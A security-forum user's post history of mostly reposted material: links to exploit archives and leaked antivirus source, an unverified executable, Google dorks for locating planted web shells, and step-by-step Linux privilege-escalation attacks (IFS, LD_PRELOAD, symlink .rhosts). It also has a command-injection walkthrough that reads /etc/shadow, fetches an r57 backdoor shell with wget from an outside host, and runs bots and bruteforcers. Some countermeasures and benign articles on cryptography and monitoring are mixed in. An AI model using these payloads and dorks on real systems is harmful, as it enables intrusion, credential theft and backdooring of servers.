Jump to content

ionut97

Active Members
  • Posts

    233
  • Joined

  • Last visited

  • Days Won

    14

Everything posted by ionut97

  1. Ceva interesant. Contine: [dir] Exploits [dir] 2011-Jun-09 [dir] GSM Hacks [dir] 2011-Jun-03 [dir] Linux [dir] 2011-Jun-24 *Nix! [dir] Local Root Exploits [dir] 2011-Jun-03 [dir] Misc [dir] 2011-Jun-03 Papers and Videos [dir] OSX [dir] 2011-Jun-24 Mac [dir] UNIX [dir] 2011-Jun-24 Novell, etc... [dir] Virii [dir] 2011-Jun-03 [dir] Win32 [dir] 2011-Jun-24 Win95, 98, NT, 2000, and XP [dir] Word Lists Link:Index of ../database/ Multe videouri,tutoriale,exploituri,tooluri,etc.
  2. ionut97

    Fun stuff

  3. Nu l-am verificat. L-am luat de pe abh.
  4. File: popelle.exe Tama? or: 90112 bytes MD5: 1fbcfdb365c38f8573c802684777fe8d SHA1: d91f4ff1f823c8cf4f9f4fc211102127bcd7280b Result: 0/35 Status: Clean AVG Free - OK ArcaVir - OK Avast 5 - OK AntiVir (Avira) - OK BitDefender - OK VirusBuster Internet Security - OK Clam Antivirus - OK COMODO Internet Security - OK Dr.Web - OK eTrust-Vet - OK F-PROT Antivirus - OK F-Secure Internet Security - OK G Data - OK IKARUS Security - OK Kaspersky Antivirus - OK McAfee - OK MS Security Essentials - OK ESET NOD32 - OK Norman - OK Norton Antivirus - OK Panda Security - OK A-Squared - OK Quick Heal Antivirus - OK Rising Antivirus - OK Solo Antivirus - OK Sophos - OK Trend Micro Internet Security - OK VBA32 Antivirus - OK Vexira Antivirus - OK Zoner AntiVirus - OK Ad-Aware - OK BullGuard - OK Immunet Antivirus - OK K7 Ultimate - OK VIPRE - OK http://www.mediafire.com/?ng5lzgyzgyy //Gata am pus alt link
  5. Hak5 - YouTube Un canal interesant cu peste 500 de video-uri.
  6. Am gasit de curand un site interesant. adamas.ai - veritas vos liberabit Dupa cum am spus contine : ebooks ezines Musik Scripts Stuff Tutorials Videos Printre care si : http://download.adamas.ai/dlbase/Stuff/KASPERSKY_AV_2k8_SOURCECODE_leak.rar http://download.adamas.ai/dlbase/Stuff/SYMANTEC_pcAnywhere_SOURCE_leak.rar http://download.adamas.ai/dlbase/Stuff/Norton_AntiVirus_2k6_SOURCE_leak.tar.gz Nu m-am uitat peste tot.In mare parte este despre malware.
  7. http://www.youtube.com/watch?v=njQSxoDBT6E&feature=player_embedded
  8. Video: https://www.youtube.com/watch?feature=player_embedded&v=4TrsFry13TU Download: http://dl.dropbox.com/u/55144650/t00...0-%20win32.zip [x86] http://dl.dropbox.com/u/55144650/t00...0-%20win64.zip [x64] Page: http://exploitpack.com/
  9. Mutillidae is a free, open source web application provided to allow security enthusiast to pen-test and hack a web application. Mutillidae can be installed on Linux, Windows XP, and Windows 7 using XAMMP making it easy for users who do not want to install or administrate their own webserver. Mutillidae contains dozens of vulnerabilities and hints to help the user exploit them; providing an easy-to-use web hacking environment deliberately designed to be used as a hack-lab for security enthusiast, classroom labs, and vulnerability assessment tool targets. Change log : Mutillidae 2.1.20: Changed some color schemes Bug fix: The html5 key validation on the on the html5 page was too restrictive. The validator was throwing errors even when the input was ok. This validation checks for any non-alphanumeric characters and prints an error if non-alphanumeric characters are found. This error message contains the bad key the user input. Since the site fails to output encode this error message, it is possible to perform DOM injection. Add the html5-storage.php to the vulnerabilities listing. Download Mutillidae 2.1.20
  10. Incearca: inurl:uploadimages.asp inurl:uploadlogo.asp inurl:uploadpictures.asp inurl:uploadgallery inurl:uploadfile.asp inurl:uploadtest.asp intitle:Test Free ASP Upload Sau pentru shelluri deja urcate: inurl:.php “cURL: ON MySQL: ON MSSQL: OFF” “Shell” filetype:php intext:”uname -a:” “EDT 2010? intitle:”intitle:r57shell” [ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ] inurl:”c99.php” & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout inurl:”c100.php” & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout intitle:”Shell” inurl:”.php” & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update
  11. Description: In this video , I have demonstrated how to upload shell on a server when .php or .asp extension are not allowed to upload.
  12. Cryptography is the study and practice of hiding information. There are a few examples of cryptography that are used in business and government to help prevent unwanted disclosure of messages and other types of information. Find out information on the most popular types and how they are used. Symmetric Cryptography There are different examples of cryptography Symmetric cryptography includes methods of encryption that are best suited for processing large streams of data. It is distinguished the use of a single key for encrypting and decrypting messages by the sender and receiver. This type of cryptography is categorized by the use of stream or block ciphers. Stream ciphers operate by encrypting single bits or bytes of information (or plaintext) at a time and implements a feedback mechanism to constantly change the key. Alternatively, block ciphers encrypts data into individual fixed group of bits (a common size is 128 bits) using the same key. An advantage of symmetric cryptography is that its methods are inexpensive for creating and processing encrypted data. The disadvantage of this example of cryptography is that is both the sender and receiver of the message have to agree on the key. If the key is discovered, the encrypted information becomes compromised. The following are popular examples of cryptography that have used symmetric encryption: International Data Encryption Method (IDEA) Advanced Encryption Standard (AES) Data Encryption Standard (DES) Two Fish is a 128 bit block cipher that uses 128/192/256 bit keys. Camelia is similar to AES and uses 128 bit block cipher. Used in 32 bit processors and 8 bit processors (smart cards). Misty 1 – Made by Mitsubishi. It is a 128 bit block cipher and used in computer hardware/software. Skipjack Asymmetric Cryptography Asymmetric cryptography (also called public key cryptography) encryption methods are best used for key exchange and user authentication. This type of cryptography is commonly used in digital signatures. It is distinguished by the use of a private and public key that are created with one-way functions using multiplication and exponentiation. One key is public and published in a public directory while the private key is only known by the receiver of the message. The following are applications that use asymmetric cryptography: Transport Layer Standard (TLS), a communications protocol which is replacing Secure Socket Layer (SSL) for transmitting data over the Internet. RSA is used in electronic commerce protocols, software production, key exchange and digital signatures. It implements a variable size encryption block and key. PGP (or Pretty Good Privacy) is used for the authentication of data communication and encrypting/decrypting email messages. GnuPG/GPG – GNU Privacy Guard is a standard that tracks specifications of OpenPGP. Elliptic Curve Cryptography Elliptic curve cryptography is a standard method used by NIST, NSI and IEEE for government and financial institution use. It is based on public key encryption and used in mobile and wireless environments. Public keys are created by utilizing the following algebraic equation - y^2=x^3 + 3 + Ax + B where the x and y points on a curve are used to calculate a public key. The private key is a random number. The appeal of elliptic curve cryptography is that it offers security with smaller key sizes which result in faster computations, lower power consumption, memory and bandwidth use. Quantum Cryptography Quantum cryptography methods use photons to create encrypted keys that can be sent over optical fiber networks by using beams of light. It uses “qubits”, which is essentially a computer bit in quantum form. Keys are created using a procedure called quantum key distribution (QKD). In this method, photons are transmitted in horizontal and vertical directions with the use of a laser source over a quantum channel. A unique property of this example of cryptography is its ability to detect the presence of anyone that tries to obtain the quantum key. Any attempt would be noticed by the sender and receiver by a high increase in the transmission error rate. Since photons cannot be copied or divided keys are virtually unbreakable. Currently, these types of method can only produce and distribute and encrypted keys. However as of 2010, Japan is working on testing new quantum cryptography methods that can be used to secure video conferencing for government communications. Final Thoughts on Cryptography While there are many examples of cryptography, security of information is never one hundred percent perfect. Even though more complex encryption methods are always being created, sophisticated hackers can learn to adapt and find a way to crack these systems. We just need to try and be one step ahead of the game. Sursa:Examples of Cryptography used in Business and Government Applications
      • 1
      • Upvote
  13. Bright Hub Quizzes. COMPUTING Computer Hardware Are You a Computer Hardware Expert? Computer History Quiz How Much Do You Know About Graphics Cards? The PC Part Compatibility Quiz Think You Know Computers? Take Our Quiz and Test Your Knowledge What Does This Piece Do? Who's the Most Evil? Test Your Knowledge of Tech Company Transgressions Computer Security Quiz: Do You Know Computer Viruses? How Safe Is Your Wi-Fi Connection? Quiz: How Secure is Your Computer? Test Your Computer Security Skills With the Malware Open Challenge Google Do You Know Everything About AdSense? Do You Really Know How to Use Google? Take Our Quiz to Test Your Google Search Basics! Google AdWords: Quiz Yourself Google on the Brain: a Quirky Quiz Linux Just Started Using Linux? Test Your Knowledge! Test Your Knowledge of Linux and Open Source Computing History Reckon You Know Everything There is to Know About Linux? Mac Are You Up to Speed in Lion? Test Your Knowledge of Apple History Steve Jobs Said What? Take the Mac Challenge: How Much Do You Know? Test Your Computer Chops with Our Macintosh Guru Quiz Test Your Steve Jobs Fandom: A Quiz Security & Privacy How Well Do You Know Your Network Security Terminology? Test Yourself! Test Your Internet Safety Knowledge Windows A Quiz for Microsoft Word Professionals Are You a Windows Expert? See How Much You Know Are You an MS Office Expert? Test Your Knowledge Think You Know Your Windows Computer? New to Microsoft Word? Find Out How Much You Know! So You Think You Can Use Microsoft Excel? A General Knowledge Quiz Test Your Microsoft History Knowledge Web Development Are You a Master of CSS? Quiz Yourself and Find Out How Well Do You Really Know SQL?
  14. Awareness of what's happening on your network, and why, makes the difference between average and excellent network administration. Great tools are needed to obtain this knowledge quickly and accurately. Fortunately, some of the best network monitoring tools are free. This article lists the top five. What Makes a Great Network Monitoring Tool? Some of the very best Network Monitoring Tools have always been free. Vendors sometimes even incorporate code based on RRDTool and MRTG into their products. Templates, free utilities, scripting, and a little web code can create a custom monitoring interface that's ideal for you and costs nothing more than the time to put it together. More advanced and detailed monitoring most often involves SNMP, which can have a steep learning curve for the beginner. Large amounts of data are generated and conted by monitoring tools. Some of this data is essentially invisible until you begin measuring and collecting it. Commercial tools can "hide" this complexity, which is one reason you might pay for them. The data is there if you're willing to make the effort to obtain it. Transforming it into useful, accurate information is what makes a great monitoring tool. The Top Five 1. MRTG - The Multi Router Traffic Grapher (MRTG) is primarily designed to monitor and graph traffic on network links. It is written in Perl, generates HTML with PNG image graphs, updated at configurable intervals. One of the best features is that it creates daily, weekly, and monthly graphs as well. You can monitor any SNMP variable you choose. In my opinion, MRTG is one of the best tools ever written for network monitoring. 2. Cacti / RRDTool - Cacti is a front end to RRDTool, and uses a MySQL database for data storage. Data sources can be created and customized. The front end is written in PHP. Many templates are available, as well as the option to grant users permissions to view only or create new graphs. 3. Nagios - Nagios goes beyond network monitoring to include notification and problem management, as well as other enterprise-class features. It has been around for over 10 years, has a large user base and support community. While some of the solutions in the top five are OS agnostic, Nagios runs on Linux or Unix. You can monitor any system or device with it, of course. 4. Ntop - Ntop is focused specifically on network traffic monitoring. IP traffic and protocol information & statistics. Information can be sorted or detailed by host, subnet, or viewed in total for the network. Ntop works with NetFlow and sFlow as well. Interestingly, it can be compiled for Windows as well as Unix. 5. Zenoss Core - If you're looking for an enterprise management platform for more than just the network, but don't have the budget for a commercial product, Zenoss has an open source alternative. Zenoss offers Professional and Enterprise versions with support and consulting available. Honorable Mentions SolarWinds Cisco Netflow v5 - This and several other SolarWinds free tools are excellent. If you have a Cisco network with Netflow this can get you started. Snort - Snort is technically an IDS (and one of the best), but can serve as a great application layer network analysis tool. I didn't include this or any other IDS as they are really a separate category. Need More? Advanced monitoring, alerts, and reporting can be built from the tools in free and open source arena, but you or your management may decide that a commercial tool or platform is a better investment. Major network equipment vendors almost always integrate easily with the most common monitoring platforms, or those vendors provide plugins and templates for SNMP data from a wide variety of equipment. Tuning and filtering data, reports, and alerts so that the NOC or helpdesk isn't innundated with redundant or irrelevant data is a big part of integrating a monitoring solution for an enterprise. There are so many possible commercial solutions, and so many ways to implement them, that a "best" choice there is unique for each business, in my experience. Using these free tools, or others that you find, is a great way to augment your knowledge and awareness of the state and health of your network. Sursa:http://www.brighthub.com/computing/smb-security/articles/35543.aspx
  15. Abusing users with '.' in their PATH: Unfortunately users and sometimes admins are lazy - its human nature to want to avoid taking unnecessary steps, in this case the user would rather type: $ program instead of $ ./program ************ Newbie Note: Having '.' in your PATH means that the user is able to execute binaries/ scripts from the current directory. ************ To avoid having to enter those two extra characters every time, the user adds '.' to their PATH. This can be an excellent method for an attacker to escalate his/ her privilege, for example: Joe (the attacker) happens to know that that Suzy has sudo privileges to change users passwords - unfortunately for the admins she also has the power to change the root password. Now Suzy is a lazy girl and thus has '.' in her PATH. Joe places a program called 'ls' in a directory Suzy often visits. This 'ls' program contains code to modify root's password. Now when Suzy enters that directory and asks for a listing, because she has '.' in her path, the 'ls' that Joe placed in the directory is run, instead of /bin/ls. Now root's password has been changed, and Joe is able to logon as root. Having '.' in your PATH can also help the attacker if exploiting programs that make system(), execvp(), or execlp() calls to programs, if they do not specify the full path to the program the attacker can place a program into a directory in the PATH, so that program is run instead - this works because programmers just expect that the program they mean to run will be in the PATH. ************ Newbie Note: To add '.' to your path type this at the prompt PATH=.:${PATH} then to be able to use the '.' in your path enter export PATH. ************ ************ Countermeasures: 1) Do not include '.' in your path! 2) Place the following at the end of your .bashrc or .profile - This will remove all occurrences of '.' in your PATH. PATH=`echo $PATH | sed -e 's/::/:/g; s/:.:/:/g; s/:.$//; s/^://'` ************ Shell Escape Sequences: Many programs offer escape sequences to display a shell to the user, programs such as - emacs - by entering alt+! - vi - by entering :![commandname] - man - by entering![command name] replacing [command name] with the program you wish to run. - Old Linux games - that incorporate a TBIC (the boss is coming) feature to escape to a shell. If you are able to use an escape sequence on a program that has suid bit set you will be given the privileges of the owner of the file. Escape sequences can help an attacker greatly, because they are so easy - although you will rarely find an escape sequence nowadays that will elevate your privilege to that of root. Try using different ctrl+[character] combinations to try and find escape sequences. For example - say that a text file had the suid bit set, and the user opened it up in vi, they could then enter :!/bin/bash, and they are given a suid root shell! ************ Countermeasures: 1) Remove any suid games, or files that could easily be exploitable by shell escape sequences. To find all suid files on your system use the following command: find / -type f -perm -4000 ************ IFS Exploit: The IFS exploit is pretty straight forward, although to the beginner it may seem a tad confusing. The IFS (or Internal Field Separator) is used to separate words/ arguments etc. In the English language we use the ' ' (space) character to seperate arguments from their commands. With an IFS set to ' ' (space) the command "ls -al" has the space between 'ls' and '-al' to separate the command to its argument. With an IFS set to ';' (semicolon) the command "ls;-al" will have the same effect as "ls -al", because we have said we wish to use the ';' instead of the space. So it uses a ';' to separate the command from its argument. A hacker can make practical use of the IFS to escalate his/ her privilege. For example: Lets say that at every logon a suid program (/usr/bin/date) executes /bin/date and displays the output on screen. An attacker can take advantage of this by doing the following (I will explain the workings of the privilege elevation after, I have numbered the lines to make the explanation easier) (the '$' is the symbol for a standard command prompt, and the '#' is symbol for the root command prompt). 1) $ cat /home/nick/bin 2) ...#!/bin/bash 3) .../bin/sh #this script will execute /bin/sh 4) $ ls -al /usr/local/date 5) ---s--x--x 1 root root 21673 Mar 9 18:36 date 6) $ PATH=/home/nick:${PATH} 7) $ export PATH 8) $ IFS=/ 9) $ export IFS 10) $ /usr/local/date 11) # whoami 12) root I will now explain the above in detail: Lines 1, 2, 3: the attacker creates a simple bash script that runs /bin/sh when executed. Lines 4 and 5: the attacker checks the permissions for the suid program that calls /bin/date. Lines 6 and 7: adds '/home/nick' to his PATH (where the 'bin' program is he wrote earlier). Lines 8 and 9: He sets the IFS to '/' this means that instead of using a space, the '/' will be used, this means that the program instead of calling '/bin/date' will call 'bin date', because he has placed a program called 'bin' in the home directory (which is now in the PATH) when /usr/local/date is executed it will execute /home/nick/bin with the permissions of /usr/local/date - which means the attacker will get a root shell! Lines 11, 12: The attacker runs 'whoami' to verify that he is root, line 12 confirms this. ************ Countermeasures: An easy way of attempting to stop IFS exploits, is to not allow users to execute any type of executable or suid programs in places that the users can write to. Directories such as /home/[username] and /tmp allow the user write permissions, this means that they can create programs then run them from the location. If directories such as /home and /tmp are on their own partitions you can disallow users to run suid programs or any executables for that matter by adding the correct options to /etc/fstab. You can do this by replacing a line similar to this: /dev/hda6 /tmp ext3 defaults 0 0 with this: /dev/hda6 /tmp ext3 nosuid,noexec 0 0 This type of countermeasure is not only useful to stop IFS attacks - but pretty much all attacks concerned with privilege escalation discussed in this manual ************ LD_PRELOAD Exploit: This attack involves .so files (part of the dynamic link library) being used by programs. The attacker can add a program pretending to be one of these libraries so that when a program is run it will execute the program pretending to be a library, this is useful if you are calling a program that has the suid bit set to root, this. So when the program is first run, it will attempt to load the library it requires (but it has been replaced with code the attacker wants executed) and thus runs the commands in the program placed by the attacker, with the permissions of the owner of the calling program. A full example of this is demonstrated below: 1) $ cat me-root.c 2) ...#include <stdio.h> 3) ...#include <unistd.h> 4) ...main() 5) ...{ 6) ......setuid(0); 7) ......setgid(0); 8) ......printf("Congratulations you are root!"); 9) ...} 10) $ gcc -o me-root me-root.c 11) $ ls -l me-root.c 12) ---s--x--x 1 root root 4365 Mar 16 14:05 me-root.c 13) $ cat me-root_so.c 14) ...void printf(char *str) 15) ...{ 16) ......execl("/bin/sh","sh",0); 17) ...} 18) $ gcc -shared -o me-root_so.so me-root_so.c 19) & LD_PRELOAD=./me-root_so.so 20) $ export LD_PRELOAD 21) $ ./me-root 22) # whoami 23) root I will explain the above attack in detail: Lines 1 to 9: The attacker creates a simple C program that runs gives sets the userid and groupid to 0 (root). Line 10: The attacker compiles the program created above and calls it me-root. Lines 11 & 12: The attacker checks the file permissions on the me-root program. Lines 13 to 17: The attacker creates the program that will pretend to be part of a library, it executes /bin/bash. Line 18: The attacker compiles the pretend library program as a shared library and calls it me-root_so.so. Lines 19 & 20: The attacker adds me-root_so.so, and exports LD_PRELOAD, so now when me-root is run it will execute the program me-root_so.so (pretending to be a library) with the permissions of me-root (in this case the permissions of userid 0 - which is the root account!). Line 21: The attacker runs the me-root program. Lines 22 & 23: The attacker verifies who s/he is, line 23 confirms s/he is root. Symlinks: Symlinks or symbolic links are a very useful tool in Linux. They allow us to make a "shortcut" (in windows terms) to a file or folder. For example ln -s /etc/passwd /tmp/passwd_file This creates a link called /tmp/passwd_file to /etc/passwd, so now whenever /tmp/passwd_file is opened it will open /etc/passwd. Although symlinks can be infinately useful, they are quite easily exploitable. Lets say for example Joe attacker is feeling particularly sneaky, Joe knows root uses '.' in his path, and that all users can post technical problems to the admin into a directory /usr/problems/. The attack is below, and the full description will follow: 1) $ ln -s /root/.rhosts /tmp/root-rhost 2) $ stat /tmp/root-rhost 3) ...stat: cannot stat /tmp/root-rhost 4) $ cat /usr/problems/ls 5) ...#!/bin/bash 6) ...if [ ! -e /tmp/root-rhost ] ; then 7) ......echo "+ +" >>/tmp/root-rhost 8) ...fi I will explain the above attack in detail: Lines 1, 2 & 3: The attacker creates symbolic link from /tmp/root-rhost to /root/.rhosts, and uses stat to see if the file existed, the output on line three indicates that /root/.rhosts does not exist (the admin removed /root/.rhosts because he saw this file as a security threat - this is what Joe wants) Line 4 to 8: He then creates a bash script called ls (which will be run instead of /bin/ls, because '.' is in his path first, when he wants to list the contents of /usr/problems/). This program tests if /tmp/root-rhost exists, because it is a symbolic link pointing to /root/.rhosts (which does not exist) it will return that /root/.rhosts does not exist, so it will then echo "+ +" into /tmp/root-rhost, which will be forwarded into the file /root/.rhosts! This will mean that root will have a passwordless login over any login that supports and allows rhosts authentication (e.g. rlogin and ssh). The trap is now set, he just has to wait! Cron jobs with symlinks can also be used to an attackers advantage, for example: The 'sales' group in businesscorp.com have a folder to post their documents for the whole group to read and write to, unfortunately the users keep forgetting to add group write permissions to their documents, so the admin developed a script that will change the files in the sales folder to the group sales, and set group writeable permissions, this script is run periodically through a cron job, the script looks like the below. 1) #!/bin/bash 2) chgrp -R sales /usr/export/sales 3) chmod -R g+w /usr/export/sales If someone sneaky in sales decided to make two symlinks to /etc/passwd and /etc/shadow, the cron job would follow the symlinks and set write permissions for the group sales on /etc/passwd and /etc/shadow. From here the attacker can change any password s/he wants. Sursa:Privilage Escalation
  16. Command injection or also known as Remote Code Execution in terms of web exploitation, can be possible to a certain website accepts added strings of characters or arguments; the inputs are used as arguments for executing the command in the website’s hosting server. Thus making it another common web application vulnerability that allows an attacker to execute arbitrary codes in the system. In fact it is included in OWASP (Open Web Application Security Project) Top Ten Web Application Security Risks. Let us take a look at the image shown above which happens to be our target and example for today. It shows a simple user-interface for querying the DNS (Domain Name System) by inserting any Internet Protocol address or host name at the dialog box. Now let us look at the sample vulnerable code for command execution or injection: ? <?php if (isset($_POST["dns-lookup-php-submit-button"])){ try{ if ($targethost_validated){ echo ‘<p class=”report-header”>Results for ‘.$lTargetHostText.’<p>’; echo ‘<pre class=”report-header” style=”text-align:left;”>’; echo shell_exec(“nslookup ” . $targethost); echo ‘<pre>’; $LogHandler->writeToLog($conn, “Executed operating system command: nslookup ” . $lTargetHostText); }else{ echo ‘<script>document.getElementById(“id-bad-cred-tr”).style.display=”"</script>’; }// end if ($targethost_validated){ }catch(Exception $e){ echo $CustomErrorHandler->FormatError($e, “Input: ” . $targethost); }// end try }// end if (isset($_POST)) ?> I got the code above from the dns-lookup.php file of a free and open source vulnerable web application that I have been playing at which is Mutillidae from Irongeek.com and developed by Adrian “Irongeek” Crenshaw and Jeremy Druin. Mutillidae is web application for you to practice your Web Fu skills like sql injection, cross site scripting, html injection, javascript injection, clickjacking, local file inclusion, authentication bypass methods, remote code execution and many more. It is packed with vulnerable pages, hints and walk-through in case you don’t have an idea on how the exploit is done. I decided to use this web application so that you could also try out this tutorial or writeup. Okay, now let’s try to query for a random IP address which is 74.125.31.102. Did you guys notice that there is a code echo shell_exec() function on the script? If you look closely on the code, you should be able to see shell_exec(“nslookup ” . $targethost); on it. With nslookup command, a user can to look up an IP address of a domain or host on a network. Linux uses “&&” to link commands and “;” as a command separator. Now, let’s try the command echo but I prefer using the | (vertical bar) instead of && to check if it is vulnerable to command injection: | echo ‘hello’ In this case the target is vulnerable to command injection or execution. It’s just like issuing the command nslookup | echo ‘hello’ in the terminal. But what’s the reason why I prefer using the pipeline or vertical bar rather than ‘&&’? Well this image should enlighten you up: The vertical bar tells the shell to provide the output of the command on the right, this is called a pipeline while the ‘&&’ links the commands nslookup and uname -a which outputs the DNS of the IP address and the kernel version of the host. In some cases, && just doesn’t work and sometimes you need to put a value on before the pipleline just like: 1 | echo ‘Infosec Institute’. But so much for that, let’s continue on gathering some information on the webserver. And because we used the command uname -a, we were able to identify that information on the system like it runs on Linux kernel release 3.0.0-16, network node hostname is projectX, the operating system is GNU/Linux, etc. . Now let’s probe or check what Linux distribution this server is: | cat /etc/issue ?| cat /etc/*-release ?| cat /etc/lsb-release | cat /etc/redhat-release (for rpm based distros) Hey it’s BackBox Linux which is one of my favorite penetration testing distros based on Ubuntu. Time to figure out where are we now and list all the directories: | pwd ; ls -la As an information gatherer, it is our task to check what services are running and which service belongs to a specific user privilege: | ?ps aux | ps -ef | top | cat /etc/service Attackers may also check if there are any settings that are mis-configured or some logs to check if anything can be exploited or if there are vulnerable plugins attached. Below are other commands for specific directories and are used in probing the web server: | cat /etc/environment | cat /proc/self/environ | cat /etc/shadow | cat /etc/sudoers | cat /etc/group | cat ?/etc/security/group | cat /etc/security/passwd | cat /etc/security/user | cat /etc/security/environ | cat /etc/security/limits | cat /usr/lib/security/mkuser.default | cat /var/log/messages | cat var/log/mysql.log | cat /var/log/user.log | cat /var/www/logs/error_log ?| cat /etc/syslog.conf | cat /etc/chttp.conf | cat /etc/lighttpd.conf | cat /etc/cups/cupsd.conf | cat /etc/inetd.conf | cat /etc/apache2/apache2.conf | cat/var/log/apache2/error.log | cat /etc/my.conf | cat /etc/httpd/conf/httpd.conf | cat /opt/lampp/etc/httpd.conf | ls -aRl /etc/ | awk ‘$1 ~ /^.*r.*/ ?| cat /etc/resolv.conf | cat /etc/sysconfig/network | cat /etc/networks ?| /sbin/ifconfig -a | cat /etc/network/interfaces ?| s -alh /var/spool/cron | ls -al /etc/ | grep cron | ls -al /etc/cron* | cat /etc/cron* | cat /etc/at.allow | cat /etc/at.deny | cat /etc/cron.allow | cat /etc/cron.deny | cat /etc/crontab | cat /etc/anacrontab | cat /var/spool/cron/crontabs/root With most attackers interested in backdooring a Linux webserver, they need to probe first ? try to how files can be uploaded so that they can deliver the finishing touch. ?| find / -name wget | find / -name nc* | find / -name netcat* | find / -name tftp* | find / -name ftp I think I’ll try wget then, so I just need to try and download a text file from a certain URL I found in Google Search Engine. ?| wget http://whateversite.com/hackers/resources/digital%20rebels/articles/unixhck.txt Wget command allows non-interactive download of files from the Web and it supports HTTP, HTTPS, and FTP protocols. Let’s try to check if the file is really uploaded by typing these commands: | ls -la | cat unixhck.txt Great, now I have downloaded a textfile of Sir Hackalot’s tutorial about Unix Hacking to the web server. Now let’s try to upload a backdoor shell in a text file. In this example I will be using a r57 Backdoor Shell from another source. | wget http://whateversite.com/backdoor.txt Now let’s make a php backdoor shell by copying the contents of backdoor.txt to newfilename.php (I’ll just make a new backdoor.php file). | cp backdoor.txt backdoor.php ?Now time to check the backdoor shell. Most backdoor shells have shell_exec() function too that’s why you can execute commands on it easier. Because it allows you command execution then attackers may also use it for running their malicious scripts like IRC Bots, Scanners, mass ssh scanners, bruteforcers, etc. For example: perl udp.pl ./a 124.104 perl wetwork.pl perl timthumbexploiter.pl python bot.py Tips for Preventing Remote Code Execution: 1. Disable the shell_exec () function if you plan not to use such function to prevent ?arbitrary code execution or if you just wan’t to get rid of this security risk. 2. But if you really need the shell_exec () function for a certain php file or form, then use escapeshellarg () function which escapes shell metacharacters and escapeshellcmd() function which is used to escape single arguments to shell functions coming from user input. Both of these functions escapes potentially dangerous characters in the string. 3. Adding a WAF or web application firewall could also help although I cannot guarantee 100 percent security since some WAF’s can still be bypassed but at least there are some preventions. It also depends on the lockdown. But I prefer using ModSecurity for hardening your Apache Web Server in Linux/Unix because it is an open source web application firewall which helps you to detect and prevent common attacks against web applications like SQL Injection, XSS, Command Injection or Execution, etc. And so I decided to share a simple guide for installing ModSecurity just in case you wanna try it out. Setting up ModSecurity in your Web Sever running Ubuntu and Debian Based Distros: 1. Type this in your terminal emulator : ?sudo apt-get install libapache2-modsecurity This should install new pagkages for libapache2-modsecurity and modsecurity-crs 2. Create a directory for ModSecurity in the Apache2 folder: sudo mkdir /etc/apache2/modsecurity 3. Create a configuration file for ModSecurity, which will be loaded by Apache, using this command: ?sudo nano /etc/apache2/conf.d/modsecurity.conf ? Add the following code, save and exit. (Ctrl +X, Type Y for to agree or say yes to the changes of the file, then press Enter to save) ## /etc/init.d/apache2/conf.d/modsecurity.conf Include modsecurity/*.conf 4. Set the ModSecurity rules using these two commands: ?cd /etc/apache2/modsecurity sudo cp -R /usr/share/modsecurity-crs/base_rules/* . 5. ?Modify and correct the line in the modsecurity_crs_20_protocol_violations.conf file: sudo nano /etc/apache2/modsecurity/modsecurity_crs_20_protocol_violations.conf ?Replace this line: SecRule REQBODY_ERROR “!@eq 0? with this one: SecRule REQBODY_PROCESSOR_ERROR “!@eq 0? Then Save and exit. ?6. Restart now the Apache web server. sudo service mysql start 7. To verify if the ModSecurity module is loaded in the Apache type this command: cat /var/log/apache2/error.log | grep modsecurity The output should look like this if configured properly ModSecurity for Apache/2.6.0 (URL) configured. There are still other configurations in ModSecurity for extra added protection so you might wanna visit their official website at ModSecurity: Open Source Web Application Firewall Additional Reading Materials: Php Endangers - Remote Code Execution Source:InfoSec Resources – Command Execution
  17. Intel CPU Vulnerability can provide control of your system to attacker The U.S. Computer Emergency Readiness Team (US-CERT) has disclosed a flaw in Intel chips that could allow hackers to gain control of Windows and other operating systems. The flaw has already been exploited on 64-bit versions of Microsoft Windows 7, FreeBSD, NetBSD and there’s a chance Apple’s OS X may also be vulnerable. The flaw was disclosed the vulnerability in a security advisory released this week. Attackers could execute malicious code via kernel privileges or launch a local privilege escalation attack. VMware's virtualization software is not affected, and neither are AMD's processors, as they do not use the SYSRET instruction whose incorrect handling causes the flaw or handle it differently.Many of the affected vendors have already pushed out an update that defuses the flaw. However, it said that while 32-bit operating systems are safe, "Intel CPUs that use the Intel 64 extension need the security patches released by Microsoft in their MS12-042 security bulletin." Source:Intel CPU Vulnerability can provide control of your system to attacker | The Hacker News
  18. This is an impressive and first-time experience in my anti-virus career. I chatted with a hacker while debugging a virus. Yes, it’s true. It happened when the Threat team were researching key loggers for Diablo III while many game players playing this game found their accounts stolen. A sample is found in battle .net in Taiwan, China. The hacker posted a topic titled “How to farm Izual in Inferno” (Izual is a boss in Diablo III ACT 4), and provided a link in the content which, as he said, pointed to a video demonstrating the means. Below is the ‘Video’. It’s a RAR archive actually containing two executable files. These two files are almost the same except the icon. The malware will connect to a remote server via TCP port 80 and download a new file packed by Themida. That’s very simple Downloader/Backdoor behavior and we are only interested in looking for key logging code for Diablo III so we didn’t pay much attention to it. But an astonishing scene staged at this time. A chatting dialog popped up with a text message: (Translated from the image below) Hacker: What are you doing? Why are you researching my Trojan? Hacker: What do you want from it? The dialog is not from any software installed in our virtual machine. On the contrary, it’s an integrated function of the backdoor and the message is sent from the hacker who wrote the Trojan. Amazing, isn’t it? It seems that the hacker was online and he realized that we were debugging his baby. We felt interested and continued to chat with him. He was really arrogant. (Translated from the image below) Chicken: I didn’t know you can see my screen. Hacker: I would like to see your face, but what a pity you don’t have a camera. He is telling the truth. This backdoor has powerful functions like monitoring victim’s screen, mouse controlling, viewing process and modules, and even camera controlling. We then chatted with hacker for some time, pretending that we were green hands and would like to buy some Trojan from him. But this hacker was not so foolish to tell us all the truth. He then shut down our system remotely. Regarding this malware, no Diablo III key logging code was captured. What it really wants to steal is dial up connection’s username and password. t sounds like a movie story, but it’s real. We are familiar with malware and we are fighting with them every day. But chatting with malware writers in real time doesn’t happen so often. Next time, I will be on the alert. The malware and its components are detected by the AVG as Trojan horse BackDoor.Generic variants. Franklin Zhao & Jason Zhou Source:Have you ever chatted with a Hacker within a virus?
